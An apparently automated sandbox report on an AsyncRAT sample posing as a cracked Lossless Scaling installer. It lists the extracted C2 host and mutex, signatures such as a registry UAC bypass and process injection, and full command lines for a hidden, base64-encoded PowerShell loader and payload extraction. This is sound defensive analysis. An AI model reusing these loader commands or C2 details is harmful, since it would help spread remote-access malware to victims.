Analysis
- Max time kernel: 120s
- Max time network: 127s
- Platform: windows10-2004_x64
- Resource: win10v2004-20250129-en
- Resource tags: arch:x64, arch:x86, image:win10v2004-20250129-en, locale:en-us, os:windows10-2004-x64, system
- Submitted: 06/02/2025, 19:45
- Static task: static1
- URLScan task: urlscan1
General

Malware Config
Extracted
- Family: asyncrat
- A 14
- Default
- C2: eg3x6.giize.com:306
- Mutex: MaterxMutex_Egypt2
- Attributes: delay 3; install false; install_folder %AppData%
Signatures

Asyncrat family

UAC bypass (3 TTPs, 1 IoC)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (powershell.exe)

Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run PowerShell and hide display window.
- PID 5128 powershell.exe
- PID 1476 powershell.exe
- PID 1808 powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation (WScript.exe)

Executes dropped EXE (2 IoCs)
- PID 5112 LosslessScaling.exe
- PID 5400 RAR.exe

Loads dropped DLL (1 IoC)
- PID 5112 LosslessScaling.exe

Enumerates connected drives (3 TTPs, 1 IoC)
Attempts to read the root path of hard drives other than the default C: drive.
- File opened (read-only): \??\E: (NOTEPAD.EXE)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- flow 6: drive.google.com
- flow 9: drive.google.com
Drops file in System32 directory (11 IoCs)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs (svchost.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat (svchost.exe)

Suspicious use of SetThreadContext (1 IoC)
- PID 1808 set thread context of 1944 (powershell.exe; procid_target 155)

Drops file in Program Files directory (31 IoCs)
All entries are "File created" by powershell.exe:
- C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\Lan.vbs
- C:\Program Files (x86)\Lossless Scaling\Lossless.dll
- C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\Licenses.txt
- C:\Program Files (x86)\Lossless Scaling\Lossless Scaling.lnk
- C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
- C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\config.ini
- C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config
- C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll
- C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (aspnet_compiler.exe)
Enumerates system info in registry (2 TTPs, 3 IoCs)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)

Modifies Control Panel (1 IoC)
- Key created: \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\Colors (LosslessScaling.exe)

Modifies registry class (3 IoCs)
- Key created: \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings (msedge.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings (mspaint.exe)
- Key created: \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings (powershell.exe)

Modifies registry key (1 TTP, 1 IoC)
- PID 3776 reg.exe

Suspicious behavior: AddClipboardFormatListener (1 IoC)
- PID 1944 aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses (33 IoCs)
- PID 3228 msedge.exe (x2)
- PID 4940 msedge.exe (x2)
- PID 220 msedge.exe (x2)
- PID 1940 identity_helper.exe (x2)
- PID 5980 mspaint.exe (x2)
- PID 5128 powershell.exe (x3)
- PID 1476 powershell.exe (x4)
- PID 5112 LosslessScaling.exe (x10)
- PID 1808 powershell.exe (x5)
- PID 1944 aspnet_compiler.exe (x1)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
- PID 4940 msedge.exe (x5)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
- Token: SeDebugPrivilege, PID 5128 powershell.exe
- Token: SeDebugPrivilege, PID 1476 powershell.exe
- Token: SeDebugPrivilege, PID 5112 LosslessScaling.exe
- Token: SeDebugPrivilege, PID 1808 powershell.exe
- Token: SeDebugPrivilege, PID 1944 aspnet_compiler.exe
- Token: SeIncBasePriorityPrivilege, PID 5112 LosslessScaling.exe

Suspicious use of FindShellTrayWindow (35 IoCs)
- PID 4940 msedge.exe (x35)

Suspicious use of SendNotifyMessage (24 IoCs)
- PID 4940 msedge.exe (x24)

Suspicious use of SetWindowsHookEx (5 IoCs)
- PID 5980 mspaint.exe
- PID 3036 OpenWith.exe
- PID 5112 LosslessScaling.exe
- PID 1944 aspnet_compiler.exe
- PID 5112 LosslessScaling.exe

Suspicious use of WriteProcessMemory (64 IoCs)
All 64 entries are writes by PID 4940 (msedge.exe) into its own child processes; the distinct rows, each repeated many times in the original table, are:
- PID 4940 wrote to memory of 4536 (msedge.exe; procid_target 84)
- PID 4940 wrote to memory of 1080 (msedge.exe; procid_target 85)
- PID 4940 wrote to memory of 3228 (msedge.exe; procid_target 86)
- PID 4940 wrote to memory of 3488 (msedge.exe; procid_target 87)

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(Tree depth is shown by indentation; each entry gives the executable path, PID, full command line and the signatures that fired in that process.)

- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4940)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.google.com/file/d/12_FHYiGAJjr_9k7nMRclVc5d9oFiJjga/view
  Signatures: Enumerates system info in registry; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4536)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9007846f8,0x7ff900784708,0x7ff900784718

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1080)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3228)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
    Signatures: Suspicious behavior: EnumeratesProcesses

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3488)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4348)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2488)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3588)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2620)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 736)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5640 /prefetch:8

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2092)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

  - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 4448)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:8

  - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 1940)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses

  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 220)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses

- C:\Windows\System32\CompPkgSrv.exe (PID 776)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

- C:\Windows\System32\CompPkgSrv.exe (PID 3200)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

- C:\Windows\System32\rundll32.exe (PID 5428)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

- C:\Windows\system32\NOTEPAD.EXE (PID 5568)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_lossless scaling.zip\password 123.txt

- C:\Windows\system32\NOTEPAD.EXE (PID 5724)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" E:\HOW TO CRACK.txt
  Signatures: Enumerates connected drives

- C:\Windows\system32\mspaint.exe (PID 5980)
  Command line: "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\How to run the program.png" /ForceBootstrapPaint3D
  Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx

- C:\Windows\System32\svchost.exe (PID 5996)
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
  Signatures: Drops file in System32 directory

- C:\Windows\system32\OpenWith.exe (PID 3036)
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  Signatures: Suspicious use of SetWindowsHookEx

- C:\Windows\system32\cmd.exe (PID 1456)
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\a\install + Crack.bat" "

  - C:\Windows\system32\reg.exe (PID 5140)
    Command line: REG QUERY "HKU\S-1-5-19"

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5128)
    Command line: powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
    (The base64 string decodes to "powershell -ExecutionPolicy Bypass -File language/win_x.ps1", which matches the child process below.)
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1476)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
      Signatures: UAC bypass; Command and Scripting Interpreter: PowerShell; Drops file in Program Files directory; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

      - C:\Windows\system32\reg.exe (PID 3776)
        Command line: "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
        Signatures: Modifies registry key

      - C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe (PID 5112)
        Command line: "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
        Signatures: Executes dropped EXE; Loads dropped DLL; Modifies Control Panel; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx

      - C:\Windows\system32\schtasks.exe (PID 4652)
        Command line: "C:\Windows\system32\schtasks.exe" /query /tn administrator

      - C:\Users\Public\IObitUnlocker\RAR.exe (PID 5400)
        Command line: "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
        Signatures: Executes dropped EXE

      - C:\Windows\System32\WScript.exe (PID 4860)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
        Signatures: Checks computer location settings

        - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1808)
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
          Signatures: Command and Scripting Interpreter: PowerShell; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

          - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 5852)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

          - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 1944)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx

      - C:\Windows\system32\schtasks.exe (PID 3280)
        Command line: "C:\Windows\system32\schtasks.exe" /query /tn administrator
Network

MITRE ATT&CK Enterprise v15
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Defense Evasion
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Impair Defenses (1): Disable or Modify Tools (1)
  - Modify Registry (2)
Downloads

- Filesize: 4.3MB
  MD5: 7969a2cbc4c31ccfb1ab8213f19501b9
  SHA1: 06a24af6e922ba2cd7fccb76ce2f43271a9af8b6
  SHA256: 486a48562504a274e984599a5931de200ea73bf6bc4c83bf6ca8daa651e80a68
  SHA512: 935988a39c1af479e971850f6758ee94098b35f173da609206312deeabeb3bc9466f93d1dad4e6d7938235f65fc52fdbd56058d46c1ba775d31718358eb6d8fa

- Filesize: 953KB
  MD5: 2c98d33096e97094cbbbd19f27f40883
  SHA1: 7e28af9d119d2658f962e3b28140c6081be1612b
  SHA256: 010ac1120a88a772e87d9e9018aa5db034a9bac9399803d4a7c4db3c47a71df6
  SHA512: f9070ad6b2e3295fdde13aa8d7486147a7f9a675a924ad3bf117479baf5b573cf92650199e58378dd8345a28ab890bbd5021d374030c24836bfa65bb037dddc7

- Filesize: 174B
  MD5: 2a2df45a07478a1c77d5834c21f3d7fd
  SHA1: f949e331f0d75ba38d33a072f74e2327c870d916
  SHA256: 051099983b896673909e01a1f631b6652abb88da95c9f06f3efef4be033091fa
  SHA512: 1a6dd48f92ea6b68ee23b86ba297cd1559f795946ecda17ade68aea3dda188869bba380e3ea3472e08993f4ae574c528b34c3e25503ee6119fd4f998835e09d7

- Filesize: 430B
  MD5: ef7d84d756944b899e4fb5d1a3339235
  SHA1: bcac0a048a418caec5281cc44121576d1cde4e70
  SHA256: 069ae15289a748ae4e1a998183c41c35a873cb8dc205318813b157c826bab6ca
  SHA512: a73e18adaa6f1e93a457d4593a652ee47eb730cac3b81cfbc1fc3ab90aa05f518ae7c96c78e94ab92949dd2c4e9a459bb54012e97fb53554397d5a6a8b556327

- Filesize: 2KB
  MD5: 45fed0a3bcbc889ca99d0c5943210e7e
  SHA1: 602584366a413cb9ae459b6c3231190cd787241e
  SHA256: 9812fe8104a86e693d6baa02a4cdb56ea9a4aedb500b050346eb5ec6bda8dd09
  SHA512: d0728fcce9484daedb2c9552ee2a818f7cccbeb1e9bca24a1c4fc1ca6e8c181c46cdc89670bfee3d6ad219ea6f69750bd03f776af4f9e4667872c66c11dbd255

- Filesize: 3KB
  MD5: 223bd4ae02766ddc32e6145fd1a29301
  SHA1: 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
  SHA256: 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
  SHA512: 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

- Filesize: 152B
  MD5: a7b5a5433fe76697fec05973806a648c
  SHA1: 786027abe836d4d8ff674c463e5bb02c4a957b70
  SHA256: c8d623536ebdf5ffbefb84013d1c8ff5f853b59f1b09c80364c32b8ed5e4a735
  SHA512: 27be4c82e26468bbb9ce698ef305320f6cac46c953f88c714a0372fa524d098b9af2a87a88b14a134ff0f5f4b3d671902908622d2c7ec48e2c7bc458d7f5cc16

- Filesize: 152B
  MD5: 8ea156392347ae1e43bf6f4c7b7bc6ec
  SHA1: 7e1230dd6103043d1c5d9984384f93dab02500a6
  SHA256: 40b28bf59b3e2026ad3ebe2fecf464a03d7094fd9b26292477ad264d4efc1c75
  SHA512: 2479b86a9a31aa2f260ff6a1c963691994242ced728a27ffa2ee4e224945446a191bdb49ce399ec5a7d5d362499716133072e97d4253b5b4f09582d58b25144f

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
  Filesize: 480B
  MD5: 9a1f084e58592e0255286e9b18b98957
  SHA1: 72548af272d68c24b412cced52c9a01e5db499e1
  SHA256: 267b4852f6c6650f88884b3770f624e6fdad6892f5b8f9c6329f27c01893a83d
  SHA512: 1be79573e390f2ae95d002879945d58d266f6861a12c0a1195ac65d9c36dcf58374292815295e2d6beedde94cd93b63844850729752a1fa300cb40a11c96049f

- Filesize: 3KB
  MD5: bc0e763361385a3c65e1f72a352a61e2
  SHA1: 883d17322756780ece65304af4ba266a8a28374f
  SHA256: 53e8931727652bea303f04f2a54ebf28f300807f30aa83ad0a0e44f04cc1cb63
  SHA512: 98e07d87954b7cc031735e4b17e55356c6c98dbecd8d5c4d6cb4e16e0d97cd214f54730599aee019829ecf333a015e97c9fe72b76e256ec762f5fb9907692cc2

- Filesize: 5KB
  MD5: a8a3efe24108ea71713b80614367ea2f
  SHA1: 1b36a38b9d12923f067f31be26ecb9299de6bb7c
  SHA256: 95fc19b17e20548cd97077058a7d834560e3d43a8bfb377c86a0bafbb16f9671
  SHA512: ec868e9ddae18be4f7d959e19e1e3487c221761598cb276c2cbf347b7c4fa56c777a52cc2a9dbf2c4bf97c3165a821196a812d4c427c48bd740af42b79b92515

- Filesize: 6KB
  MD5: 215c221ac0e6907ca2877e2ab44c0f80
  SHA1: 58512b3c1c25f5c735a319aed7ffce64c90b9155
  SHA256: 09ccb40287b725a80e4a74d9b62b100c7ca5f22dfa0e96e50ec7ab683d2f530f
  SHA512: e4b386daf293934f557b13f1d264f39041c043d3ff1a5b13fc575b733a658654862f38d8f34d4c30dcb22a25ac79e220acb997a08d3a4a7c7c2129680a7b45aa

- Filesize: 6KB
  MD5: 4f39cb8a965fc898f6b948e980d19212
  SHA1: 1691a15a1f7d7eeda7dacf3c53ce07e639d3919b
  SHA256: b37c64b1a4ad8a72b2dc9b7908fd199d3be8c9979c0d2eba1c4261530185974a
  SHA512: 33798705bfe13dfe18fdc10c19e4afb51cca8f50ec58ba43b82dd6ba33ec66b924f7eb276df2dd64ecfbf69aaee79e8b4d79562680334b2d4f31c7006b9c9226

- Filesize: 7KB
  MD5: 1ad9ff4e5a7f0d83c0e36c89d8057a59
  SHA1: 9ce4cd253eb7b3b137c713733f159fbc9ee97564
  SHA256: 0914df2dd89c54bb3ac1303191862c6ce9940e60956bfd975a712428286eba54
  SHA512: 5ac31d8099a98b4bb8b4fbcf40661c3e8f0378d0ed9dbffbc22f4dad83c1b55cdff88e4771a8d9489ede035f9c14fe9db3c793cf1d28403beb911dbabcb0e510

- Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

- Filesize: 11KB
  MD5: ff8cfd56bd64c1519eb3c4ccbc02d6a4
  SHA1: 878d2952c64f4402311a16c5f7800cb507493da4
  SHA256: e571cc4ac1655f1fb674084ab7c7ad8dae1bc2a81c77cd4804446cc881bb2b24
  SHA512: 46b696dd14f6c4a7f7f5c7b96f07cdb62e4a32780a7518a9b5b427df884757d23121c079d747d731768372a9a3699606383f4ad95776433fd39d7d1b4d744446

- Filesize: 10KB
  MD5: 34c1113af54846a59e1515492f5b34ce
  SHA1: 0c5b3b6b5a771dc2a53da2d73cb2233d2b367fb0
  SHA256: 201e188dac0a5b7e53b5f445cb81014b5b8df9d41751a2a53ed2faf984366233
  SHA512: 4109e336a323cdb05b5e7e8971810fd06f50d78103c5ec7e8256b6a7e242eef7dc9edefa8f881e2cc9184d6e50729415d42cc50ad7aa621119b53f631c176ead

- Filesize: 11KB
  MD5: 531490c29468222d0e1afa5e00d31340
  SHA1: f316dafa33db4ac6a0451acaf1930efbfbe530fa
  SHA256: 7e65e8ab461a0e92055ef9cfcdbf0ad1cc2e61843f09ffe7036da12cfc22b821
  SHA512: 0fb9e34feb93beb35c53bd3293858a494c43fb8939f67b45818dc946c5c731164759cae99c6a4a554d52e9321e90575aa81069cf92f518a8342bdf80d8da05d9

- Filesize: 1KB
  MD5: 612b19feac3b60bdc771ec888769ea75
  SHA1: cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb
  SHA256: 3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1
  SHA512: 2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- Filesize: 5.4MB
  MD5: 77bccf39263dca973605a6738ad416f9
  SHA1: c974af30fa4122a7b04a901f42d5ebffcfdbd6e8
